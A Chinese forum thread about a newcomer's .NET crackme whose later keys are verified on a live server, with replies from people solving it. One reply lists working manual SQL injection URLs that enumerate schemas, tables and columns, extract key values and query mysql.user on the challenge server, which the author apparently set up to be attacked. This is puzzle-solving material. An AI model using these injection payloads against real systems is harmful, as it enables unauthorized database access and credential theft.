新人首编CM。.net+网络知识。我觉得题出的很难啊，累死你们都解不开！

xiaobaoxiao

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
新人第一次编写crackme。你看看我的CB和热心值，还不支持一下？希望大家多多支持点积分，就这么点动力。
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
简介：.net4.0 无壳无混淆无恶心代码。1，2比较简单。3，4有点难。即使你不会.net也关系不大。因为这个主要是考验网络知识的！注意3，4必须联网验证。另外，我要说的是，请您放心，解题全程无需暴力破解密码的过程，key1-2-3-4也都不是靠猜的！只有最后的key是要从key1-2-3-4里猜一下，请仔细思考，勿使用跑字典的暴力方式，毕竟我的服务器顶不住啊。
另外第三个key。期望你们能给出手工注入的链接。依赖工具总是有限制的不是。。
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
请不要将密码区域截图分享，分享结果区域就可以。
得到以下图为成功。


下不了论坛附件，就链接: http://pan.baidu.com/s/1eSsvaH8 密码: wep7
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
通过服务器上看。
183.11.74.*   在[26/Apr/2017:18:54:46 +0800]得到key1+key2+key3+key4+fubak。备注，看您的记录是使用的工具sql吧。看起来效率不错，分享一下这个工具呗？
其他的请加油。
从访问记录上看，你们真的在猜key啊。真不是猜的！！再次重申不是靠猜的，猜的话，累死也猜不到,因为key是一段无规律和意义的字符！！
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
有人破解成功后，适时我会公布所有源码，包括服务器端的php的源码。你们自然就看懂了，不是猜的。
哈勃：https://habo.qq.com/file/showdetail?pk=ADEGYl1tB2IIMVs%2f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回应要求。删除提示。

凉游浅笔深画眉

xiaobaoxiao 发表于 2017-4-26 20:30
看我这的记录。他应该是用注入工具直接跑的。。N百条访问记录！

原来如此 我都是手动注入的。早知道有工具我就不那么麻烦了。

http://qq.rushnet.cn:5678/crackme3.php?key=123456' union all select SCHEMA_NAME from information_schema.SCHEMATA   -- '

数据库名字：crackme

information_schema

遍历数据库所有表：

http://qq.rushnet.cn:5678/crackme3.php?key=123456' union all select table_name from information_schema.tables where table_schema='crackme' and table_type='base table'    -- '

crackme_key
crackme_nextclue
crackme_truekey

查询表crackme_key下的所有字段：

http://qq.rushnet.cn:5678/crackme3.php?key=123456' union all select COLUMN_NAME from information_schema.COLUMNS where table_name = 'crackme_key'   -- '

字段：
id
mykey
result

4D34A1A7
4EWWA2A3

查询User表所有用户
http://qq.rushnet.cn:5678/crackme3.php?key=123456' union all SELECT User FROM mysql.user -- '

ugvnui

这个有何意义啊？太难了吧、、、谁能猜出来文件名是啥。。。

xiaobaoxiao

ugvnui 发表于 2017-4-26 12:11
这个有何意义啊？太难了吧、、、谁能猜出来文件名是啥。。。

请问哪个key？没有靠猜的。都有解。

fisher

fd大法好

xiaobaoxiao

fisher 发表于 2017-4-26 12:38
fd大法好

你需要这五张图片来证明你通过了测试。

凉游浅笔深画眉

楼主你把提示全删了吧，我应该也能搞定。

xiaobaoxiao

凉游浅笔深画眉 发表于 2017-4-26 15:19
这完全考验的是sql注入的水平

输入：http://qq.rushnet.cn:5678/crackme3.php?key=key3'or 23 LIMIT 1,1 ...

Wrong!But you are close.
错误！但是你离答案很近了。

加油！

凉游浅笔深画眉

xiaobaoxiao 发表于 2017-4-26 15:26
Wrong!But you are close.
错误！但是你离答案很近了。

坐等精通入侵渗透的大牛来玩。

xiaobaoxiao

凉游浅笔深画眉 发表于 2017-4-26 15:32
不好搞了，这玩意有难度。坐等精通入侵渗透的大牛来玩。

好吧。。等大神来破。

枫恋蓝点

我就看看,不说话.....